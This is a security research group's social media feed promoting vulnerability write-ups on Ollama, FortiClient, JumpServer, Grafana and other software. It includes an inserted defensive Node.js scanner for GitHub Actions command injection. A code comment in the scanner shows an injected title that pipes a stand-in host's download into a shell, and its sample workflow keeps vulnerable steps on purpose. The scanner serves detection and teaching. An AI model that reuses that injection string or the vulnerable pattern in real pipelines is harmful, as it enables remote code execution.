SonarResearch
@sonarresearch.bsky.social
Cutting-edge security research by
Sonar to educate the world about code security across all software.
We're also at @[email protected] 🦣 and @Sonar_Research 🐦
From bit flip to RCE in Ollama! 🦙
Our latest blog post explains how a file parsing bug led to an interesting out-of-bounds write primitive. Learn how it could have been exploited in Ollama, a tool to run LLMs locally:
www.sonarsource.com/blog/ollama-...
#security #vulnerability #llm #ai
www.sonarsource.com
November 4, 2025 at 5:20 PM
🔄📦 GitHub Actions offer powerful automation capabilities for CI/CD, but they're not immune to attacks.
Take a look at how we tackle this risk with SonarQube Cloud by diving into real-world vulnerabilities.
www.sonarsource.com/blog/securin...
#appsec #security #vulnerability
Securing GitHub Actions With SonarQube: Real-World Examples
This blog introduces SonarQube's enhanced analysis capabilities for GitHub Actions, designed to proactively identify and remediate security vulnerabilities like Command Injection and Code Execution th...
www.sonarsource.com
October 15, 2025 at 3:55 PM
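The post above points at Sonar's write-up without showing a pattern. As an added illustration that is not from the original post and not SonarQube's own analysis, the following Node.js script scans a constructed workflow for the canonical GitHub Actions command-injection pattern: an expression such as `${{ github.event.issue.title }}` expanded directly into a `run:` script, where the value is attacker-controlled and is substituted into the script text before the shell parses it. The workflow text, step names and the `findRunInjections` function are all constructed for this example; the scanner is line-based, not a full YAML parser.

```javascript
'use strict';

// Contexts GitHub documents as attacker-influenced: anything under
// github.event.* comes from the triggering event payload (issue titles,
// PR bodies, commit messages, ...); github.head_ref is the PR source branch.
const UNTRUSTED_PREFIXES = ['github.event.', 'github.head_ref'];

// Find ${{ ... }} expressions that expand an untrusted context inside a
// `run:` script. A title like `"; curl evil | sh; #` then runs as shell.
// Line-based scanner for illustration only (constructed for this example).
function findRunInjections(workflowText) {
  const findings = [];
  const lines = workflowText.split('\n');
  let inBlock = false;   // inside a `run: |` / `run: >` block scalar
  let keyCol = -1;       // column of the `run` key; block lines sit deeper

  const scan = (text, lineNo) => {
    for (const m of text.matchAll(/\$\{\{\s*([^}]*?)\s*\}\}/g)) {
      const expr = m[1];
      if (UNTRUSTED_PREFIXES.some((p) => expr.startsWith(p))) {
        findings.push({ line: lineNo, expression: expr });
      }
    }
  };

  for (let i = 0; i < lines.length; i++) {
    const line = lines[i];
    const indent = line.length - line.trimStart().length;
    if (inBlock) {
      if (line.trim() === '') continue;            // blank lines stay in the block
      if (indent > keyCol) { scan(line, i + 1); continue; }
      inBlock = false;                              // dedented: block scalar ended
    }
    const m = line.match(/^\s*(?:-\s+)?run:\s*(.*)$/);
    if (!m) continue;
    const value = m[1].trim();
    if (value.startsWith('|') || value.startsWith('>')) {
      inBlock = true;
      keyCol = line.indexOf('run:');
    } else {
      scan(value, i + 1);                           // inline `run: echo ...`
    }
  }
  return findings;
}

// Constructed sample workflow: two vulnerable steps and one hardened step.
// In the hardened step the untrusted value is bound to an environment
// variable, so the shell only ever sees "$TITLE" and treats it as data.
const SAMPLE_WORKFLOW = [
  'name: triage',
  'on: [issues, pull_request_target]',
  'jobs:',
  '  triage:',
  '    runs-on: ubuntu-latest',
  '    steps:',
  '      - name: greet (vulnerable, inline run)',
  '        run: echo "New issue: ${{ github.event.issue.title }}"',
  '      - name: label (vulnerable, block scalar)',
  '        run: |',
  '          echo "branch: ${{ github.head_ref }}"',
  '          ./label.sh',
  '      - name: greet (hardened)',
  '        env:',
  '          TITLE: ${{ github.event.issue.title }}',
  '        run: echo "New issue: $TITLE"',
].join('\n');

function scanSample() {
  return findRunInjections(SAMPLE_WORKFLOW);
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of scanSample()) {
    console.log(`line ${f.line}: untrusted expression in run script: ${f.expression}`);
  }
}
```

The scanner reports the two vulnerable steps (lines 8 and 11 of the sample) and stays silent on the hardened one, because the `${{ }}` expression there lives under `env:`, where GitHub binds the value without shell interpretation.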
Using SonarQube to solve a CTF challenge? Done! ✅
Learn how we detected a 0-day vulnerability during #KalmarCTF, making us first to solve the challenge! From Zip Slip to RCE, using lazy class loading:
www.sonarsource.com/blog/code-se...
#appsec #CTF #vulnerability
www.sonarsource.com
September 16, 2025 at 3:38 PM
🗒️✍️Taking a note on security: our latest blog post focuses on Go vulnerabilities, including Arbitrary File Write, XSS, and Misconfiguration. Showcasing our new support for the language in SonarQube Cloud!
www.sonarsource.com/blog/securin...
#appsec #security #vulnerability
Securing Go Applications With SonarQube: Real-World Examples
Take a deep dive into some vulnerabilities in Go applications and understand how SonarQube Cloud helps developers detect and mitigate them during the development cycle.
www.sonarsource.com
August 7, 2025 at 2:44 PM
📱 Ever wondered what vulnerabilities look like in Android apps?
We have 2 real-world examples for you! From simple misconfig to cross-app data flow, learn how vulnerabilities manifest in the Kotlin code of Android apps:
www.sonarsource.com/blog/securin...
#appsec #security #vulnerability
Securing Kotlin Apps With SonarQube: Real-World Examples
Explore how real-world vulnerabilities look in the Kotlin code of Android apps and see how SonarQube helps detect them.
www.sonarsource.com
July 16, 2025 at 1:19 PM
🔓⏫ After compromising every endpoint within an organization, our “Caught in the FortiNet” blog series comes to an end with one more thing.
Read more about FortiClient's XPC mistake that allows local privilege escalation to root on macOS:
www.sonarsource.com/blog/caught-...
#appsec #security
Caught in the FortiNet: How Attackers Can Exploit FortiClient to Compromise Organizations (3/3)
In the last blog of this series, we will focus back on FortiClient and learn how the inner workings of this application work, and what crucial mistake happened that led to us uncovering a local privil...
www.sonarsource.com
July 8, 2025 at 3:32 PM
📁🫷🚧Can't control the extension of a file upload, but you want an XSS?
Read more on how we overcame this obstacle to further exploit entire organizations using Fortinet endpoint protection:
www.sonarsource.com/blog/caught-...
#appsec #vulnerability #bugbountytips
Caught in the FortiNet: How Attackers Can Exploit FortiClient to Compromise Organizations (2/3)
We recently discovered critical vulnerabilities in Fortinet’s endpoint protection solution that enable attackers to fully compromise organizations with minimal user interaction. In this second article...
www.sonarsource.com
July 1, 2025 at 2:21 PM
🕸️🏢Caught in the FortiNet: Exploiting Fortinet’s endpoint protection solution to compromise an entire organization using minimal user interaction.
Dive into our technical analysis of this interesting attack scenario:
www.sonarsource.com/blog/caught-...
#appsec #security #vulnerability
Caught in the FortiNet: How Attackers Can Exploit FortiClient to Compromise Organizations (1/3)
We recently discovered critical vulnerabilities in Fortinet’s endpoint protection solution that enable attackers to fully compromise organizations with minimal user interaction. In the first post of t...
www.sonarsource.com
June 26, 2025 at 2:14 PM
Catch our second talk at #TROOPERS25:
🕸️ Caught in the FortiNet: Compromising Organizations Using Endpoint Protection
Yaniv Nizry will tell you the story of multiple vulnerabilities in Fortinet products that can compromise an entire organization, starting with a single click
June 24, 2025 at 8:32 AM
Coming to #TROOPERS25 this week? We'll be there too, presenting our research!
🎨 Scriptless Attacks: Why CSS is My Favorite Programming Language
@pspaul95.bsky.social will convince you why CSS should not be overlooked in client-side web attacks and what is possible without JavaScript today
June 23, 2025 at 10:57 AM
SQL Injection despite using prepared statements? 🧐
Turns out that SQL syntax can be ambiguous! Learn how this has led to vulnerabilities in several popular PostgreSQL client libraries:
www.sonarsource.com/blog/double-...
#appsec #security #vulnerability
Double Dash, Double Trouble: A Subtle SQL Injection Flaw
Can a simple dash character introduce a security risk? Discover how SQL line comments can open the door to unexpected injection vulnerabilities in several PostgreSQL client libraries!
www.sonarsource.com
June 10, 2025 at 3:20 PM
Scripting Outside the Box! 📦
Last week, we saw JS sandboxing pitfalls in API clients. Today, we continue with more complex sandbox escapes in Bruno and Hoppscotch.
Learn how they work and how to sandbox JS securely in part 2:
www.sonarsource.com/blog/scripti...
#appsec #security #vulnerability
Scripting Outside the Box: API Client Security Risks (2/2)
Continuing on API client security, we cover more sandbox bypasses, this time in Bruno and Hoppscotch, as well as JavaScript sandboxing best practices.
www.sonarsource.com
May 20, 2025 at 2:48 PM
Ever wondered what's going on behind the scenes of your API client? 🕵️♀️
We dug in and found a variety of JS sandboxing pitfalls! Find out how Postman and Insomnia tried to isolate untrusted code and what challenges they faced:
www.sonarsource.com/blog/scripti...
#appsec #security #vulnerability
Scripting Outside the Box: API Client Security Risks (1/2)
Discover hidden risks in API testing tools like Postman and Insomnia. We dive into scripting vulnerabilities and explore JavaScript sandbox security pitfalls.
www.sonarsource.com
May 13, 2025 at 3:09 PM
📊⚠️ Data in danger!
We found an XSS vulnerability in Grafana with the help of SonarQube. Learn about the details in our latest blog post:
www.sonarsource.com/blog/data-in...
#appsec #security #vulnerability
Data in Danger: Detecting Cross-Site Scripting in Grafana
Learn how SonarQube detected a Cross-Site Scripting (XSS) vulnerability in Grafana, a popular open-source data observability platform.
www.sonarsource.com
April 24, 2025 at 3:02 PM
🦘🛜 Our second part of the “Diving Into JumpServer” series is live:
Read more on how an attacker who bypassed authentication can execute code and fully compromise the JumpServer instance and internal hosts:
www.sonarsource.com/blog/diving-...
#appsec #security #vulnerability
www.sonarsource.com
March 25, 2025 at 3:28 PM
🦘🛜 Compromising a bastion host to gain full control over the internal infrastructure.
Read more about the vulnerabilities we uncovered in JumpServer in our recent blog post:
www.sonarsource.com/blog/diving-...
#appsec #security #vulnerability
Diving Into JumpServer: Attacker’s Gateway to Internal Networks (1/2)
A bastion host offers a centralized point of access and control to an internal network, but what happens when this gateway itself is compromised? In this blog series, we will dive into vulnerabilities w...
www.sonarsource.com
March 20, 2025 at 3:13 PM